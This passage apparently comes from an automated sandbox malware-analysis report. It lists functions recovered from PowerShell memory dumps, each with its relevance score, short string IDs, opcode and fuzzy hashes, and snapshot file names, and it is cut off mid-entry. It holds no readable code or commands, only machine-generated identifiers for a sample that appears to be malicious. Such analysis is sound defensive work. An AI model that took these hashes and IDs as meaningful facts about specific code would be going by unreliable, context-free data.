                                                • Instruction Fuzzy Hash: A6C1177291DAC64FE356DB2888A54A17FE0FF22794F5800FFC4898B1D3EB296806C715
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                Function 078488A8 Relevance: 26.0, Strings: 20, Instructions: 1020COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$tPcq$tPcq$x.hk$-hk
                                                • API String ID: 0-1361273202
                                                • Opcode ID: 93c5a92d3e32bd02bdbb688d8fab563acfea3a0b4115d0fba3e9647a38443924
                                                • Instruction ID: 52b4c5f0cea0fc7a582588531e23c1b5c431740012149f908a1020e3a5a95f7e
                                                • Opcode Fuzzy Hash: 93c5a92d3e32bd02bdbb688d8fab563acfea3a0b4115d0fba3e9647a38443924
                                                • Instruction Fuzzy Hash: 9782C3B0B0021DCFDB34DF68C955B6ABBB2AF95314F1480AAD5059B345CBB1ED81CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784E0F5 Relevance: 22.0, Strings: 17, Instructions: 704COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$x.hk$x.hk$x.hk$-hk$-hk
                                                • API String ID: 0-3107389305
                                                • Opcode ID: 35283ebc0eff0099dde6c36c16a186e0bf67b432fff08d2e518151663edec8a1
                                                • Instruction ID: 00e7cc3001234fe714d9538c5913c52060c0af051e52929414d9d44b965cf30f
                                                • Opcode Fuzzy Hash: 35283ebc0eff0099dde6c36c16a186e0bf67b432fff08d2e518151663edec8a1
                                                • Instruction Fuzzy Hash: 276232B4A002199FDB64DF64C951BAEBBB2FF84314F1080E5D609AB351CB719E85CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07847798 Relevance: 15.9, Strings: 12, Instructions: 930COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$84ul$84ul$tPcq$tPcq
                                                • API String ID: 0-3478800167
                                                • Opcode ID: e7c8ab76350963e52368acc77a756c30afd1723419eab03b463ad30c68b9e35c
                                                • Instruction ID: cd2e88683d9e4a11255a24f68a6b87ba5bddedc47b18d9150f3d827f9b498528
                                                • Opcode Fuzzy Hash: e7c8ab76350963e52368acc77a756c30afd1723419eab03b463ad30c68b9e35c
                                                • Instruction Fuzzy Hash: 7C828EB4B10209CFDB14CF98C951AAABBB6EF99314F14C069D8059F355CBB2EC45CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07845BC0 Relevance: 15.4, Strings: 12, Instructions: 447COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$$cq$$cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-1572487497
                                                • Opcode ID: 5df4c6afb091090eb28bd1047c9e50c481a331f4dfc270ae18a4f8f9b9df8af3
                                                • Instruction ID: 16e797e6694da4d0d551dbd41a72ac96d52695c305565fa049574560b2a2efb2
                                                • Opcode Fuzzy Hash: 5df4c6afb091090eb28bd1047c9e50c481a331f4dfc270ae18a4f8f9b9df8af3
                                                • Instruction Fuzzy Hash: 6FE125B170434E8FCB258F28C81476EBFB2AFD6214F1480ABD445CB292DB75C961C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07843338 Relevance: 14.6, Strings: 11, Instructions: 817COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Tgk$0Ucq$4'cq$4'cq$4'cq$4'cq$DUgk$XYwl$XYwl$tPcq$tPcq
                                                • API String ID: 0-3555300875
                                                • Opcode ID: 5f280ffa59826caf173957f340d1475af235911964124b34469f74c46ff1caca
                                                • Instruction ID: 90defcda4f788dc57a234bcc1f053ac352e4cb67900c316dad801318208a4a77
                                                • Opcode Fuzzy Hash: 5f280ffa59826caf173957f340d1475af235911964124b34469f74c46ff1caca
                                                • Instruction Fuzzy Hash: FE425AB170424E8FCB15DF68944166AFFA2AFE6314F24C0BAC445EBA52DB71C851C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049CD850 Relevance: 10.5, Strings: 8, Instructions: 520COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8Nkj$Hgq$h]kj$h]kj$h]kj$$cq$$cq$Ikj
                                                • API String ID: 0-1331133414
                                                • Opcode ID: 05d62a781bfb7e8edc9bdd53b6ea11e558fbc2538eb15026cdade99ff7afc322
                                                • Instruction ID: 006f57e97aa57c5752102226dee3632585a65c2ba6aca137ed2ed85c527a4178
                                                • Opcode Fuzzy Hash: 05d62a781bfb7e8edc9bdd53b6ea11e558fbc2538eb15026cdade99ff7afc322
                                                • Instruction Fuzzy Hash: 1B226034B112148FCB25DF24C9587AEB7B6BF89304F1484A9D50AAB3A1DF35AD85CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784A058 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$x.hk$-hk
                                                • API String ID: 0-1331884746
                                                • Opcode ID: b6d50b963754176a48dd3ed79192835d8d3274aa0a23a285151e5bf14fe00dab
                                                • Instruction ID: c87d6c497bd4b277d8784331cb2a535c42bae2367237fd965b6995b92369c40a
                                                • Opcode Fuzzy Hash: b6d50b963754176a48dd3ed79192835d8d3274aa0a23a285151e5bf14fe00dab
                                                • Instruction Fuzzy Hash: 13D184B4A502099FCB18DFA8C555B5EBBB2EF88314F11C025D501AF355CBB5DC86CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 078492BB Relevance: 9.1, Strings: 7, Instructions: 387COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$(fwl$4'cq$4'cq$x.hk$x.hk$-hk
                                                • API String ID: 0-2350833763
                                                • Opcode ID: 563272bfc00ec5e4b5d99a06b9edac0f80131c52c67fd50b27b60c8e86bd9254
                                                • Instruction ID: c5a16fd8f039511b073f7dc311718c3616e9066a455243b378a08660f65897d7
                                                • Opcode Fuzzy Hash: 563272bfc00ec5e4b5d99a06b9edac0f80131c52c67fd50b27b60c8e86bd9254
                                                • Instruction Fuzzy Hash: E4F195B0A002199FDB24DF58C951F6EBBB3EF84300F1580A9D509AF791DB71ED858BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784F529 Relevance: 7.9, Strings: 6, Instructions: 397COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$(fwl$4'cq$4'cq$x.hk$x.hk
                                                • API String ID: 0-1127448283
                                                • Opcode ID: 08d024fd30a5eb43a9f8968fbe00d6409ecbe536401b568040a4aee8ad1135c1
                                                • Instruction ID: 2bca88bfa0eb1b4c7a1103a68100c35f95b309b680d02a281377ed06701dda4e
                                                • Opcode Fuzzy Hash: 08d024fd30a5eb43a9f8968fbe00d6409ecbe536401b568040a4aee8ad1135c1
                                                • Instruction Fuzzy Hash: A40220B4A40219DFDB64DF64C950BADBBB2EB85304F1081E5DA09AB741CB719EC1CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784E818 Relevance: 7.9, Strings: 6, Instructions: 363COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$4'cq$4'cq$x.hk$x.hk$-hk
                                                • API String ID: 0-335189296
                                                • Opcode ID: 6ad8046e444a0d9a7a934c78844839d86680af6e4c63c1892d4a84b3d3d97870
                                                • Instruction ID: 83c9d72149ad0be6b4837a58aa9bbc603cd6378f31944cfcd5706e288c2c8d48
                                                • Opcode Fuzzy Hash: 6ad8046e444a0d9a7a934c78844839d86680af6e4c63c1892d4a84b3d3d97870
                                                • Instruction Fuzzy Hash: E5E165B4A402189FDB64DF68C954BAEBBB2FF84300F1080A5D6099F391CB759D81CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07840638 Relevance: 7.8, Strings: 6, Instructions: 324COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-915829551
                                                • Opcode ID: c28832e64be535d5d6d78c6c1a9e4b4ac937b4bba42be52b5ceaf0f5c9d58ce9
                                                • Instruction ID: fe315c69ef59cd855b4eef845b0711ed3e12d3f702dc1c0c982907440812885d
                                                • Opcode Fuzzy Hash: c28832e64be535d5d6d78c6c1a9e4b4ac937b4bba42be52b5ceaf0f5c9d58ce9
                                                • Instruction Fuzzy Hash: 3AB14AF2B0420EDFDB149E68D940677BBA6EFE5314F1480EAD605CB251DBB1C841CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784A038 Relevance: 6.5, Strings: 5, Instructions: 268COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$x.hk$-hk
                                                • API String ID: 0-2992026589
                                                • Opcode ID: 285d5dc401b85625dbdd8c6a62be28755276c1d9e014ca3f4301655666934e5b
                                                • Instruction ID: 97240c4c09e77383e91720381d9a35104447baded97623f466245a89c21a87c7
                                                • Opcode Fuzzy Hash: 285d5dc401b85625dbdd8c6a62be28755276c1d9e014ca3f4301655666934e5b
                                                • Instruction Fuzzy Hash: FAB1A2B4A502099FCB18CF64C554B9EBBB2EF88314F15C055D901AF355CBB6EC86CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07842BF8 Relevance: 5.6, Strings: 4, Instructions: 580COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq
                                                • API String ID: 0-1446110543
                                                • Opcode ID: 29e76e13b82359ad8465cdf2a5ed6134f9a0c4ac4e50797533d156d935da21dd
                                                • Instruction ID: 9e4dbc1f6fcbb1ce762862eb77fe4ba3f51017a2b199b95d96ee1be5cbef3fb9
                                                • Opcode Fuzzy Hash: 29e76e13b82359ad8465cdf2a5ed6134f9a0c4ac4e50797533d156d935da21dd
                                                • Instruction Fuzzy Hash: 6D125AB170821E8FCF259F78840176ABFA2BFE5325F1480BAE505DB651DB71C941CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784814D Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$(fwl$(fwl
                                                • API String ID: 0-2374567490
                                                • Opcode ID: 3ee54b1266f890246b7ac7db51a13aed90d65c8a33b4284611846afac89e5522
                                                • Instruction ID: 7e0c3a8deb87f822bdb20411fce7c3a058e71811054f46702527b6d21469efb5
                                                • Opcode Fuzzy Hash: 3ee54b1266f890246b7ac7db51a13aed90d65c8a33b4284611846afac89e5522
                                                • Instruction Fuzzy Hash: CB1278B4A00209DFDB24CF98C541AA9BBB6FF95314F14C069D90AAF356CBB2EC45CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07848500 Relevance: 4.0, Strings: 3, Instructions: 247COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$(fwl$x.hk
                                                • API String ID: 0-1798524581
                                                • Opcode ID: 5f06ac943b17692b872dafa5b7f61e47d20a16ef1c27949cc5be1d4de6f3a885
                                                • Instruction ID: 01a24e84da5ee5a33f0b9ef8ba197e3a025340f91723ad2ffe3a75e3c6ed389a
                                                • Opcode Fuzzy Hash: 5f06ac943b17692b872dafa5b7f61e47d20a16ef1c27949cc5be1d4de6f3a885
                                                • Instruction Fuzzy Hash: 5D91A1F4B102099FDB14DF68C555B9EBBE2AF98314F148068D901AF791CB72EC81CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 078484D8 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$x.hk
                                                • API String ID: 0-1073778575
                                                • Opcode ID: d086235f4e486bdbed241c22fb7d48efd9eb5c0ad3fed2b1cb12a2a2f6fadde9
                                                • Instruction ID: d00be12f9aaa07e470b443211b34dc1dab8ec88afe592c2d77634b4f9ac8775b
                                                • Opcode Fuzzy Hash: d086235f4e486bdbed241c22fb7d48efd9eb5c0ad3fed2b1cb12a2a2f6fadde9
                                                • Instruction Fuzzy Hash: BF91B3F4A102099FCB14DF68C555B9DB7F2AF98314F148069E901AF791CB72EC81CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049CE508 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: h]kj$Ikj
                                                • API String ID: 0-2804767068
                                                • Opcode ID: 368d3999047fa406cbbcd28b93659be4669dbdfc0f473a16cfeb217e9193795e
                                                • Instruction ID: 67aee6685a4bb462f142a9a37fc7164c21d25d43b11e2fa8b6a02ecb42a68417
                                                • Opcode Fuzzy Hash: 368d3999047fa406cbbcd28b93659be4669dbdfc0f473a16cfeb217e9193795e
                                                • Instruction Fuzzy Hash: 8A31FA34A011188FCF25DB64C9586EEB7B2AF89305F1144E9D50AAB352CF35AE95CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07840619 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq
                                                • API String ID: 0-2695052418
                                                • Opcode ID: fefcf0be667fea60fcc1ae9502c02aad68a939b0ef018d296a54a0cbfa7eaa4c
                                                • Instruction ID: 03fe6157d2afbdc2a492ea7d0fb35764359060d137a57bd09c0f79dffe881c78
                                                • Opcode Fuzzy Hash: fefcf0be667fea60fcc1ae9502c02aad68a939b0ef018d296a54a0cbfa7eaa4c
                                                • Instruction Fuzzy Hash: 941151B570A38EEFD7168F14D940A26BBB1AFE2214B1980DBD645CF1A3E776C804CB11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 078408C2 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq
                                                • API String ID: 0-2110363268
                                                • Opcode ID: 5d282dc30c6f64764fe5ac9ffa75ce757b5008ebec08d613fd39ab2b5cd2a7a2
                                                • Instruction ID: 6d0c4233fd752f19eca9dd558b37705e6a2a7282f0e8ca807bc3fa01dd192996
                                                • Opcode Fuzzy Hash: 5d282dc30c6f64764fe5ac9ffa75ce757b5008ebec08d613fd39ab2b5cd2a7a2
                                                • Instruction Fuzzy Hash: DA8147B670434E9FCB158F68D81026BBFA5AFD6224F1884EBD544CB292DB71C845C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784A47E Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: x.hk
                                                • API String ID: 0-3394790906
                                                • Opcode ID: d3e3114a4788b9bd20036774af7f199bf2db47e740913c0b36d6cd5415b6cc25
                                                • Instruction ID: 043f88c5ce4f4444c36a846c859f53992cb6bb4e53a33ba621c390c2b725d16f
                                                • Opcode Fuzzy Hash: d3e3114a4788b9bd20036774af7f199bf2db47e740913c0b36d6cd5415b6cc25
                                                • Instruction Fuzzy Hash: 8B31A4B4750108ABD7149BA8C965BAF7BA7DF84354F10C025EA01AF781CFB69C468BE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0784331D Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0Ucq
                                                • API String ID: 0-3536499240
                                                • Opcode ID: 910b7cef500a5fb96cf19a0fdefb5dcfc8cd97b6522e180e5740c1e1b6c1eca4
                                                • Instruction ID: cd7b2ef9c6a4b6e153c6ece931a8f4519e4e53a7b120668617d24c3bf54ad9ba
                                                • Opcode Fuzzy Hash: 910b7cef500a5fb96cf19a0fdefb5dcfc8cd97b6522e180e5740c1e1b6c1eca4
                                                • Instruction Fuzzy Hash: 561102757083468FC305CF699490A1ABFB6BFC621472984ABD448DF692CE388C46C751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049CC048 Relevance: .3, Instructions: 346COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4864dcd3ce0ea58977b1f1b62324571f777e23fefc1d72d680c1e573dc41eecf
                                                • Instruction ID: e16b085e0f3bf706944e1ffcaa0d11a9edbe7791336504ec5b1589c8d7e61aeb
                                                • Opcode Fuzzy Hash: 4864dcd3ce0ea58977b1f1b62324571f777e23fefc1d72d680c1e573dc41eecf
                                                • Instruction Fuzzy Hash: 75E10974A01209AFDB15DF98D484AADFFB2FF88310F258569E809AB355C731ED81CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049CADA8 Relevance: .3, Instructions: 316COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4017052d2bc2d9fe73bf73f4eef52189c84fc57f73deb991e64320c3fc50eeba
                                                • Instruction ID: 9862b42a2141a9203719f5648dd63e49968aae51fc479af7639680bafb4b8585
                                                • Opcode Fuzzy Hash: 4017052d2bc2d9fe73bf73f4eef52189c84fc57f73deb991e64320c3fc50eeba
                                                • Instruction Fuzzy Hash: 6EC1CF35A00208CFCB14DFA5E545AADBBB6FF85314F118569E8069B365CB34FC49CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C3670 Relevance: .3, Instructions: 314COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: df75eeba35b71591b22f8fa3ebbbc4cdebc3fb405a96337930abdc1d7a9e1d07
                                                • Instruction ID: ef6de81736039db4f19df0182927ac6b8e0db26874dd225b78603d4c89743a7c
                                                • Opcode Fuzzy Hash: df75eeba35b71591b22f8fa3ebbbc4cdebc3fb405a96337930abdc1d7a9e1d07
                                                • Instruction Fuzzy Hash: 11D11574A01249DFCB15CFA8D594A9DFBB2EF88310F25C569E808AB361C731ED81CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049CAAE0 Relevance: .2, Instructions: 229COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1a8e14795da4fe408b9b7d846d7583c573a00248c636bf71d291143349d7f83
                                                • Instruction ID: 5ea4b704b1f77de4e5dd1285646b8602865aac9ce88d383a5c0d98d433d4ccb1
                                                • Opcode Fuzzy Hash: a1a8e14795da4fe408b9b7d846d7583c573a00248c636bf71d291143349d7f83
                                                • Instruction Fuzzy Hash: B191CD34A012589FCB14DF68D884AAEBBF2FF89310F1485B9E4459B362CB35EC85CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C8720 Relevance: .2, Instructions: 216COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f6aef5562233e8bf579fc3e47f8954dc72fc6077e4a609aaba663ae7df5ef0c
                                                • Instruction ID: bda8ef54bf122f67d64af0399cb69b53fe4ef2688e18bbd9a2ea8225b9a7c77c
                                                • Opcode Fuzzy Hash: 4f6aef5562233e8bf579fc3e47f8954dc72fc6077e4a609aaba663ae7df5ef0c
                                                • Instruction Fuzzy Hash: 4791AF34A00249CFCB15DFA4C544AADBBB2FF85301F2585A9E4069F366D778ED89CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C8DBE Relevance: .2, Instructions: 188COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b933d0c225ba839978f30fbdd2e2b3da673326865ba534f6bcf014332c82b5e9
                                                • Instruction ID: 85fbc3a7be13b5521b599426695a008622632d05642a4b826fda54cd90f58628
                                                • Opcode Fuzzy Hash: b933d0c225ba839978f30fbdd2e2b3da673326865ba534f6bcf014332c82b5e9
                                                • Instruction Fuzzy Hash: 0E713C70A00608DFDB15EFA4D484BADBBF6BF88305F148429D412AB790DB74AD89CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C87BA Relevance: .2, Instructions: 166COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 32eeacd5c8902339998210baec0565b4e28c3531e11213a401b707ae21c56a33
                                                • Instruction ID: ec9120bbcfff52af6c310b8ef7f2e16c061c5624976635530614de1def727fc9
                                                • Opcode Fuzzy Hash: 32eeacd5c8902339998210baec0565b4e28c3531e11213a401b707ae21c56a33
                                                • Instruction Fuzzy Hash: A2616334A002498FDB15DFA4C544AADBBF2FF85301F248568E802AF765D778ED89CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 049C8C50 Relevance: .2, Instructions: 166COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05e1b5386665ce803b9fbe998b836d7078dd254615f754b18524c3592c10f379
                                                • Instruction ID: a6bfec10988b726834181a12d284989068221b495570292bf142aa3a3f7a8151
                                                • Opcode Fuzzy Hash: 05e1b5386665ce803b9fbe998b836d7078dd254615f754b18524c3592c10f379
